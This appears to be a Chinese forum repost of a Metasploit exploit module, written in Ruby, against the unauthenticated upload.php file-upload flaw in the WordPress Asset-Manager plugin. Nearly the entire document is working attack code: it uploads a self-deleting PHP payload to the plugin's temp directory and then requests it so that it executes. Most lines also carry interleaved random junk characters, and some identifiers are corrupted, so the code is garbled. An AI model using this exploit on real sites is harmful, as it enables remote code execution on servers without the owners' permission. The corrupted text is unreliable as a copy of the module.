这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
, t8 e$ g4 J- Q
; O: }% m; y3 k! s4 m8 H##
Q* |& K1 a" l& |) `# This file is part of the Metasploit Framework and may be subject to
" b7 T8 _5 H' o3 U4 u: O# redistribution and commercial restrictions. Please see the Metasploit
, l' }: Q5 O7 h0 U" Q" Y# Framework web site for more information on licensing and terms of use.
( O* E7 ?0 c' j( a1 b# http://metasploit.com/framework/) B6 f1 A# M$ x* f, f# m3 h
##
" U/ x& w0 i, F% U3 v. L6 t
% g- D7 l/ ^* d" y U B6 s3 \require 'msf/core'8 ]; ] C5 q3 F) D- j
require 'msf/core/exploit/php_exe'- l+ d/ b( o& _1 R0 t+ Y
1 k& }/ ^" f: s+ P4 Wclass Metasploit3 < Msf::Exploit::Remote
) A, T# J2 W% m Rank = ExcellentRanking+ W0 C$ _' J K0 h, J' @& s! t$ D1 Z
1 k3 Y2 q% o: E include Msf::Exploit::Remote::HttpClient
1 }1 {8 ^! M/ j) S9 _5 x0 ] include Msf::Exploit: hpEXE2 S# z- V7 |/ o* a; m2 e) b, ?
* ?/ W8 c+ x1 ] def initialize(info = {})
' C9 }, d4 C9 Z super(update_info(info,
8 }' k+ P y; e) b7 A 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',( `4 t$ V4 k8 y
'Description' => %q{1 t, X/ Q2 D% }' g0 J0 {, F1 `
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress5 W$ d2 \ s# u! o6 m
plugin. By abusing the upload.php file, a malicious user can upload a file to a3 K9 Q( `" q# \! }& f) z
temp directory without authentication, which results in arbitrary code execution.% K6 N* C) P1 J1 {
},- T# |" a& z( h
'Author' =>( X7 |+ T! [$ ?& G
[' J. q' {: v2 }2 @9 K, T5 ]' A9 j
'Sammy FORGIT', # initial discovery7 {6 \6 M, X+ D3 j
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
/ S- g1 N8 L4 W$ E& v; l. l% J8 u' S ],
) |; Q, p- A0 i8 v 'License' => MSF_LICENSE,
R' `" ?! U$ `2 V$ f# i3 y 'References' =>
, n) S' p. d, h+ [! j) o8 c9 W [! I. v, u: z( |
[ 'OSVDB', '82653' ],
" V2 R! ^ Q; o1 `) m( i" Q4 c [ 'BID', '53809' ],
; Q5 @5 H: [* C5 n [ 'EDB', '18993' ],+ m& o% E) N4 e' B" W* n% Q
[ 'URL', 'http:// www.myhack58.com /' ]
% X/ I5 I7 Q* ^% Z" b, U ],
6 q9 ~# k, r0 W- _: B2 F 'Payload' =>
8 X3 k& a c; C8 S6 O8 k {
+ D7 W, `+ d( I6 [ 'BadChars' => "\x00",( x) C( I- b1 F% I4 h! w9 T; o
},- {, r5 J! a5 i* v
'Platform' => 'php'," S$ e* n, E: r! z
'Arch' => ARCH_PHP,
. ]/ b/ C/ _) _ 'Targets' =>& l! i& p: i/ }# a. ?$ f( D
[
0 {3 p, }2 p& a) g$ G" t+ y [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],. T" b$ R; s! ?9 f5 n8 B
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
3 r# m' u1 C9 T% S6 u7 F ]," Q0 o* k. a7 h1 `8 z( `
'DefaultTarget' => 0,& ^! h- t0 e# u* g
'DisclosureDate' => 'May 26 2012')); l7 u; N* C3 g ^9 B; |- I' K
! d& r+ g f/ P* a4 I" h) X
register_options(
; V9 Y- n, T8 X/ y( M [
6 @& l+ P: b- Y) ^& u/ f$ b1 d7 a OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
" ~5 j' p! j6 A: k2 ?. Y' ~ E' ^ ], self.class)
0 g* H0 r6 E; z* W h& I* _$ ] end/ Y: Q J( w2 M
& S. e- f5 O! S. x& h2 b9 [
def exploit# [$ N$ A1 V! |
uri = target_uri.path% B, x+ [7 a7 G0 w
uri << '/' if uri[-1,1] != '/'- ~% O+ B- d3 D& X) d
peer = "#{rhost}:#{rport}"
) K6 ?, u" k8 K" s2 J& m payload_name = "#{rand_text_alpha(5)}.php"8 s3 E0 e5 U5 Y! j$ @9 ^4 c* B
php_payload = get_write_exec_payload(:unlink_self=>true)
' b# h. d/ }) a& B- w 5 K! e5 n! Q$ b3 x0 N+ U8 [
data = Rex::MIME::Message.new
. F+ p+ ]! ~0 [& W# H data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
1 L( a8 H* c4 A0 F6 q( } post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')- }# ^- M" S- _5 N
2 O* Y6 Q/ d! ^
print_status("#{peer} - Uploading payload #{payload_name}")
$ y+ C& Z- J3 W q4 _/ h res = send_request_cgi({/ S# I. ]/ B4 c/ O/ D" F2 S
'method' => 'POST',
+ R2 h ?0 r* V& E9 D. W 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
- J( C& _+ x6 _1 j; R 'ctype' => "multipart/form-data; boundary=#{data.bound}",& z% R6 z9 X- M$ m
'data' => post_data
8 ?) C5 T9 `7 Z U; [4 X# a })9 P) ~* z8 m3 h9 Y6 A8 [, S. b
; R) ]+ k: u5 \+ l5 v
if not res or res.code != 200 or res.body !~ /#{payload_name}/6 X7 S: R2 M6 c
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")" F6 h$ H) `: y
end: q8 \5 ^ B% z5 h/ h0 p1 G" k
; d8 q- v; G! _6 q! D. {6 J
print_status("#{peer} - Executing payload #{payload_name}")+ t- S, j- e3 O* `
res = send_request_raw({
- M* m/ s: `7 Y9 J; U! B, X! f 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",% W& h! n- B* E8 b- { w
'method' => 'GET'
. g+ m l, V+ _9 W, ]; {) B })
% Y5 x8 J% b" C7 @3 t( m
( Q* x2 S; C9 w% q5 ^, L if res and res.code != 200( R9 [- K% P; {6 p8 ]$ u
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")6 _8 R8 t+ {9 G
end
# T) k5 ^6 C6 p) @. B3 D$ W9 m end
2 I* ?% A6 p$ G8 K% tend6 i: ]8 P- s9 `6 _
|